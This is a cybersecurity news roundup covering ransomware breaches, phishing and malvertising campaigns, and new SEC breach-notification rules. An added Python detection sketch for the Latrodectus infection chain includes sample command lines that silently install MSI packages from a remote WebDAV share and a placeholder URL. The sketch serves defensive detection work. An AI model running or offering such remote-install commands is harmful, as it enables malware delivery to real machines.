Students find flaw in internet-connected laundry machines, SEC adds incident response rules for financial sector, Nissan, American Radio Relay League and MediSecure Breaches, and a 21 Savage-style Cybersecurity Rap.
Breaches and Attacks in the News
MediSecure Data Breach Impacts Patient and Healthcare Provider Information
By Ionut Arghire – SecurityWeek
Australian digital prescription services provider MediSecure says data stored on its systems up until November 2023 was compromised in a recent ransomware attack. The incident, the company announced last week, originated from a third-party provider, and impacted both personal and health information belonging to patients. While the full scope of the data breach has yet to be determined, MediSecure revealed over the weekend that the compromised information is related to prescriptions delivered through its system until November 2023.
See also: MediSecure e-script firm hit by ‘large-scale’ ransomware data breach
Nissan reveals ransomware attack exposed 53,000 workers’ social security numbers
By Graham Cluley – Bitdefender Blog
Nissan North America has revealed that extortionists who demanded a ransom after breaking into its external VPN and disrupting systems last year also stole the social security numbers of over 53,000 staff. The security breach occurred on November 7, 2023. Upon initial investigation, Nissan and the external experts brought in by the firm found that although cybercriminals had accessed its systems without authorisation, the data accessed had been mostly business-related. This was communicated to workers in a Nissan Town Hall meeting on December 5, 2023. Unfortunately, Nissan now finds itself in the embarrassing position of having to warn workers that sensitive personal information was accessed by the hackers – including the names and social security numbers of over 53,000 current and former employees.
See also: Nissan infosec in the spotlight again after breach affecting more than 50K US employees, Nissan North America data breach impacts over 53,000 employees
American Radio Relay League cyberattack takes Logbook of the World offline
By Lawrence Abrams – BleepingComputer
The American Radio Relay League (ARRL) warns it suffered a cyberattack, which disrupted its IT systems and online operations, including email and the Logbook of the World. ARRL is the national association for amateur radio in the United States, representing amateur radio interests to government regulatory bodies, providing technical advice, and promoting events and educational programs for enthusiasts around the country. On Thursday, the ARRL announced that it suffered a cyberattack that disrupted its network and systems, including various online services hosted by the organization.
See also: American Radio Relay League Hit by Cyberattack
Banco Santander warns of a data breach exposing customer info
By Bill Toulas – BleepingComputer
Banco Santander S.A. announced it suffered a data breach impacting customers after an unauthorized actor accessed a database hosted by one of its third-party service providers. With a strong presence in Spain, the United Kingdom, Brazil, Mexico, and the United States, Banco Santander is one of the largest and most significant banks in the world, known for a diverse range of financial products and services, serving over 140 million customers.
Threats, Campaigns, and Techniques in the News
Students Uncover Security Bug That Could Let Millions Do Their Laundry For Free
By Dhivya – Cyber Security News
Two UC Santa Cruz students found a major security flaw in CSC ServiceWorks laundry machines. Over a million internet-connected laundry machines in homes, hotels, and colleges worldwide are affected by the bug, which allows people to run them for free. The students who discovered it, Alexander Sherbrooke and Iakov Taranenko, reported it earlier this year. Despite their attempts to get it addressed, CSC ServiceWorks has not fixed the vulnerability, leaving the system exposed. The finding occurred in early January, when Sherbrooke was seated on the floor of his basement laundry room with his laptop. He started a laundry cycle without paying by running a script, and the machine replied instantly, ready to wash a free load of clothing. The students demonstrated the weakness by adding a fictional balance of several million dollars to one of their laundry accounts, which appeared as normal in the CSC Go mobile app. According to TechCrunch's findings, the discovery exposes a serious flaw in the API of CSC's mobile app, the interface through which apps and devices communicate online.
See also: Two students find security bug that could let millions do laundry for free, Two Students Uncovered a Flaw That Allows Using Laundry Machines for Free
Windows Quick Assist Anchors Black Basta Ransomware Gambit
By Elizabeth Montalbano – DarkReading
Following a recently documented Black Basta ransomware vishing campaign, Microsoft Threat Intelligence acknowledged on May 15 that a financially motivated threat actor tracked as Storm-1811 has been following the same playbook since mid-April. The threat group is using a social engineering campaign to trick victims into letting it use Quick Assist for remote access to their machines, posing as trusted contacts such as Microsoft technical support or an IT professional from the targeted user’s company. Quick Assist is a Windows app that enables a person to share their Windows or macOS device with someone else over a remote connection.
See also: Windows Quick Assist abused in Black Basta ransomware attacks
Latrodectus Malware Loader Emerges as IcedID’s Successor in Phishing Campaigns
The Hacker News
Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. “These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV share,” Elastic Security Labs researchers Daniel Stepanic and Samir Bousseaden said. Latrodectus comes with standard capabilities that are typically expected of malware designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, allowing threat actors to conduct various post-exploitation activities.
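As an added illustration (not code from Elastic Security Labs or the article), the Python sketch below shows one way a defender could flag the msiexec-from-WebDAV step of the chain described above in process-creation telemetry. The event fields, parent/child pairs and sample events are constructed for the example.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (constructed shape, not a real sensor schema)."""
    parent_image: str
    image: str
    command_line: str

# Constructed sample events modelled on the reported chain: a script invokes WMI
# (WmiPrvSE.exe), which launches msiexec.exe against a package on a remote share.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "\\203.0.113.10@80\share\update.msi" /qn'),
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i http://example.invalid/pkg.msi /quiet"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"'),  # benign local install
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /x {PLACEHOLDER-PRODUCT-CODE} /qn"),  # WMI-driven, but local
]

# HTTP(S) URLs and UNC paths; WebDAV forms such as \\host@SSL\share or \\host@80\share
# fall under the UNC branch as well.
REMOTE_SOURCE = re.compile(r"(?i)(?:https?://\S+|\\\\[^\\\s]+\\\S+)")
SILENT_FLAG = re.compile(r"(?i)/q[nb]?\b|/quiet")
SUSPICIOUS_PARENTS = ("wmiprvse.exe", "wscript.exe", "cscript.exe")

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def score_event(ev: ProcEvent) -> list[str]:
    """Return the list of indicators present on an msiexec.exe launch (empty otherwise)."""
    reasons: list[str] = []
    if _basename(ev.image) != "msiexec.exe":
        return reasons
    if REMOTE_SOURCE.search(ev.command_line):
        reasons.append("remote_package")
    parent = _basename(ev.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent:{parent}")
    if SILENT_FLAG.search(ev.command_line):
        reasons.append("silent_install")
    return reasons

def detect(events) -> list[tuple[ProcEvent, list[str]]]:
    """Alert on a remote package plus at least one corroborating indicator."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if "remote_package" in reasons and len(reasons) >= 2:
            hits.append((ev, reasons))
    return hits
```

Event 4 carries two indicators but no remote package, so it is scored but not alerted on; tuning that threshold is the usual trade-off against WMI-driven software deployment in the environment.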
Ransomware gang targets Windows admins via PuTTy, WinSCP malvertising
By Lawrence Abrams – BleepingComputer
A ransomware operation targets Windows system administrators by taking out Google ads to promote fake download sites for PuTTY and WinSCP. WinSCP and PuTTY are popular Windows utilities, with WinSCP being an SFTP and FTP client and PuTTY an SSH client. System administrators commonly have higher privileges on a Windows network, making them valuable targets for threat actors who want to quickly spread through a network, steal data, and gain access to a network’s domain controller to deploy ransomware.
Asian Threat Actors Use New Techniques to Attack Familiar Targets
By Microsoft Security – DarkReading
Since June 2023, Microsoft has observed several notable cyber and influence trends from China and North Korea that indicate nation-state threat groups are doubling down on familiar targets by using more sophisticated influence techniques to achieve their goals. To protect their organizations against the latest attack vectors and nation-state threats, security teams must remain abreast of these trends. In recent months, Chinese cyber actors have broadly targeted three core areas: entities across the South Pacific islands, regional adversaries in the South China Sea, and the US defense industrial base. Meanwhile, Chinese influence actors have been able to refine their use of AI-generated and AI-enhanced content while also experimenting with new media in an attempt to stoke divisions within the US and exacerbate rifts in the Asia-Pacific region.
Scammers Fake Docusign Templates to Blackmail & Steal From Companies
By Nate Nelson – DarkReading
Phishing emails mimicking Docusign are rising, thanks to a thriving underground marketplace for fake templates and login credentials. Over the past month, researchers from Abnormal Security claim to have tracked a significant increase in phishing attacks designed to mimic legitimate Docusign requests. A quick trip down the rabbit hole took them to a Russian cybercrime forum, where sellers peddled a variety of templates resembling authentic emails and documents. “Everybody’s been conditioned — especially after some time in the workplace — that Docusign links look a certain way,” explains Mike Britton, CISO of Abnormal Security. “It’s got the blue background, the ‘Docusign’ logo, that [characteristic] look and feel. In any given week I probably deal with half a dozen different things that I have to sign for Docusign — whether it’s from a vendor, a partner, whatever — I’m kind of conditioned to see it, click it, and kind of go into autopilot.”
Black Basta ransomware group’s techniques evolve, as FBI issues new warning in wake of hospital attack
By Graham Cluley – Exponentiale Blog
Security agencies in the United States have issued a new warning about the Black Basta ransomware group, in the wake of a high-profile attack against the healthcare giant Ascension. The cyber attack last week forced the Ascension computer systems offline, and caused some hospital emergency departments to turn away ambulances “in order to ensure emergency cases are triaged immediately.” In a statement, Ascension confirmed that while its hospitals were providing healthcare, the ransomware attack meant that its electronic health records and other systems used to order tests, procedures, and medications were currently unavailable.
Cybersecurity Regulations in the News
SEC: Financial orgs have 30 days to send data breach notifications
By Bill Toulas – BleepingComputer
The Securities and Exchange Commission (SEC) has adopted amendments to Regulation S-P that require certain financial institutions to disclose data breach incidents to impacted individuals within 30 days of discovery. Regulation S-P was introduced in 2000 and controls how some financial entities must treat nonpublic personal information belonging to consumers. These rules include developing and implementing data protection policies, confidentiality and security assurances, and protecting against anticipated threats. The new amendments adopted earlier this week impact financial firms, such as broker-dealers (funding portals included), investment firms, registered investment advisers, and transfer agents. The modifications were initially proposed in March of last year to modernize and improve the protection of individual financial information from data breaches and exposure to non-affiliated parties.
See also: SEC Adds New Incident Response Rules for Financial Sector, Financial institutions ordered to notify customers after a breach, have an incident response plan
Cybersecurity Opinions in the News
CISOs Grapple With IBM’s Unexpected Cybersecurity Software Exit
By Jeffrey Schwartz – DarkReading
IBM’s surprise departure from cybersecurity software this week didn’t just rearrange the competitive landscape — it also reshuffled the procurement plans and vendor relationships for many CISOs rebuilding their SOCs. IBM has agreed to sell the QRadar SaaS portfolio to Palo Alto Networks for an undisclosed sum. After years of development, IBM started rolling out the QRadar Suite in 2023, a cloud-native set of shared endpoint security components, including multiple detection and response products (EDR, XDR, and MDR), along with log management capabilities, notably security information and event management (SIEM) and security orchestration, automation, and response (SOAR) platforms.
Addressing the Cybersecurity Vendor Ecosystem Disconnect
By Andrew Morriss – DarkReading
If you are a member of the security team in charge of defending a network, you are probably accustomed to working with a technology stack composed of hardware (computers, servers, appliances, and network gear), software (applications and services), and data (logs and packet captures) from dozens of different sources. All of these tools generate a wealth of information that needs to be merged and then combined with your own internal systems and data to triage and defend against attacks. Consolidating and joining this data can be complex and difficult for customers, but it has become status quo in the technology industry. Everyone knows that if you want a functional technology stack, you need to invest a significant portion of your budget in a variety of overlapping tools and services and then be prepared to invest a substantial amount of time on an ongoing basis to make the information relevant and useful for your own business. There doesn’t appear to be any way around it.
CISO Corner: What Cyber Labor Shortage?; Trouble Meeting SEC Disclosure Deadlines
By Tara Seals – DarkReading
In this week’s CISO corner: CISOs & Their Companies Struggle to Comply with SEC Disclosure Rules, Podcast: Dark Reading Confidential: The CISO & the SEC, Top 5 Most Dangerous Cyber Threats in 2024, DR Global: Singapore Cybersecurity Update Puts Cloud Providers on Notice, There Is No Cyber Labor Shortage, and Is CISA’s Secure by Design Pledge Toothless?